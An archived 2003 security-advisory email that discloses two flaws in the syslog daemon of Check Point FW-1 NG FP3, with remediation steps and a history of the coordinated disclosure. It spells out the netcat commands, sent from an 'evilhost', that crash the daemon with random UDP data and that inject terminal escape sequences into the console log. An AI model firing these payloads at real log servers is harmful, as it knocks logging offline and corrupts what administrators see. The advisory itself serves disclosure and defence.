[NEWS] Check Point FW-1 DoS Attack against Syslog Daemon
From: support@securiteam.com
Date: 03/23/03
- Previous message: support@securiteam.com: "[NT] New Attack Vectors and a Vulnerability Dissection of MS03-007"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: 23 Mar 2003 16:43:45 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
In the US?
Contact Beyond Security at our new California office
housewarming rates on automated network vulnerability
scanning. We also welcome ISPs and other resellers!
Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
- - - - - - - - -
Check Point FW-1 DoS Attack against Syslog Daemon
------------------------------------------------------------------------
SUMMARY
Two vulnerabilities have been found in Check Point FW-1's Syslog daemon.
One allows successful DoS from remote against syslog daemon of Check Point
FW-1 NG FP3 (also FP3 HF1). The other allows syslog message containing
escape sequences directed to syslog daemon of Check Point FW-1 NG FP3
(including HF1 and HF2) remain unfiltered and cause strange output
behavior if the log is viewed on console.
DETAILS
Check Point VPN-1/FW-1 NG FP3 contains a syslog daemon (default: off) to
redirect incoming syslog messages from remote (e.g. routers) to Check
Point's SmartTracker logging mechanism. This syslog daemon can be crashed
from remote and it will not start again automatically. Neither the
watchdog service detects the crash nor does an entry in the SmartView
Tracker appear regarding the unavailability of syslog daemon.
Additionally it will print all chars received in a syslog message from
remote without any modifications. This means, escape sequences are not
filtered or e.g. expanded to their octal values in ASCII.
1. Vulnerability: Successful DoS from remote against syslog daemon of
Check Point FW-1 NG FP3 (also FP3 HF1), perhaps remote root exploit
possible.
Tested version and platform:
Check Point FW-1 NG FP3 (with or without HF1) on Red Hat Linux 7.3 running
kernel 2.4.9-34
md5sum of binary
[firewall]# md5sum /opt/CPfw1-50-03/bin/syslog
4eba3458cb05ed30dec6a75a17b0925a /opt/CPfw1-50-03/bin/syslog
Contained in:
[firewall]# rpm -qf /opt/CPfw1-50-03/bin/syslog
CPfw1-50-03
With build time:
[firewall]# rpm -q --queryformat "%{buildtime}\n" CPfw1
1032421147 (Thu 19 Sep 2002 09:39:07 AM MEST)
Note: FP3-HF1 does not update this binary.
Instruction how to crash the syslog daemon of Check Point FW-1 NG FP3:
Start syslog daemon by enabling in the firewall object (and run
cpstop/cpstart afterwards) or by hand executing:
[firewall]# /opt/CPfw1-50-03/bin/syslog 514 all
Shutting down kernel logger: [ OK ]
Shutting down system logger: [ OK ]
Starting system logger: [ OK ]
Starting kernel logger: [ OK ]
Segmentation fault <- caused after receiving random syslog payload, see
below
Check for listening syslog daemon:
[firewall]# netstat -lnptu |grep -w 514
udp 0 0 0.0.0.0:514 0.0.0.0:* $pid/syslog
Note also that this daemon is running as "root":
# ps -ux | grep -w syslog
root $pid 0.0 6.8 148064 8612 ? S 12:17 0:00 syslog 514
all
Send a valid syslog message from a remote host (here also a Linux system):
[evilhost]# echo "<189>19: 00:01:04: Test" | nc -u firewall 514
Send random payload via syslog message from a remote host:
[evilhost]# cat /dev/urandom | nc -u firewall 514
The previous started syslog daemon should crash after short time, use
"netstat" to see whether a daemon is still listening on UDP port 514
Note: For a clean restart of Check Point's syslog daemon the firewall
service needs to be restarted.
Solutions to prevent the successful DoS attack against syslog service:
- Upgrade to FP3 HF2 as soon as possible, see
<http://www.checkpoint.com/techsupport/ng/fp3_hotfix.html>
http://www.checkpoint.com/techsupport/ng/fp3_hotfix.html for more
information (available since 14 March 2003).
- Customize your ruleset and accept syslog messages only from dedicated
(and trusted, see below) senders by the enforcement module
2. Vulnerability: Syslog messages containing escape sequences directed to
syslog daemon of Check Point FW-1 NG FP3 (including HF1 and Hf2) remain
unfiltered and can cause strange output behavior if log is viewed on
console.
Tested version and platform:
Check Point FW-1 NG FP3 (also with HF1 or HF2) on Red Hat Linux 7.3
running kernel 2.4.9-34
Syslog message from network is not checked against non-printable
characters, therefore if log is viewed on console, you can no longer trust
the visual output at all.
Instructions for demonstration:
Enable receiving of syslog from remote by FW-1 like e.g. described above.
View log on console by running following command:
[firewall]# fw log -nfnl
Send some special escape sequences via syslog, e.g.
[evilhost]# echo -e "<189>19: 00:01:04:
Test\a\033[2J\033[2;5m\033[1;31mHACKER~
ATTACK\033[2;25m\033[22;30m\033[3q" | nc -u firewall 514
Take a look at the console again, but don't be scared too much for now...
Press CTRL-C and reset the console to standard by executing:
[firewall]# reset
Attackers might send many "special" escape sequences, for Linux as
destination see "man console_codes" for more.
Note: Standard syslog daemon on a RHL 7.3 system treats code like this as
shown here:
Mar 14 13:29:30 linuxbox 19: 00:01:04: Test^G^[[2J^[[2;5m^[[1;31mHACKER
ATTACK ^[[2;25m^[[22;30m^[[3q
Solutions to prevent unfiltered console output:
- Filter log output by using "tr" like:
[firewall]# fw log -tfnl | tr '\000-\011\013-\037\200-\377' '*'
(all chars with ASCII codes from decimal 0-31 and 128-255 except 10 for LF
are replaced by a '*')
- Update Check Point's syslog daemon to newer version once again, when
available.
- Improve rule set like suggested above.
History:
2003-01-17: Syslog crash issue detected by Dr. Peter Bieringer of AERAsec
while testing the new introduced syslog daemon feature in FP3
2003-01-17: Create first internal summary
2003-01-17: Information about the crash sent to vendor by e-mail
2003-01-20: Extend summary to a full advisory
2003-01-23: Unofficial confirmation that information was received by
vendor
2003-01-24: Official answer which confirms this issue
2003-01-28: Cosmetic review of advisory
2003-02-28: Detect problem with unfiltered console codes, notify vendor by
e-mail (no response about that problem until now)
2003-03-14: Add information about unfiltered console codes, review for
publishing
2003-03-17: Pre-final review
2003-03-20: Check Point posted an alert
2003-03-21: Final review and official announcement
2003-03-21: Add note about distribution of this advisory
2003-03-22: Fix some typos
Note: The 2 month delay between notifying vendor and public release of
this advisory was caused by an accepted request of the vendor for a delay
to avoid breaking its already running QA cycle for HF2.
Official word from Check Point:
Additional information about the vulnerability can be viewed by going to:
<http://www.checkpoint.com/techsupport/alerts/syslog.html>
http://www.checkpoint.com/techsupport/alerts/syslog.html or
<http://www.checkpoint.com/techsupport/ng/fp3_hotfix.html>
http://www.checkpoint.com/techsupport/ng/fp3_hotfix.html
ADDITIONAL INFORMATION
The information has been provided by <mailto:pbieringer@aerasec.de> Dr.
Peter Bieringer.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NT] New Attack Vectors and a Vulnerability Dissection of MS03-007"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
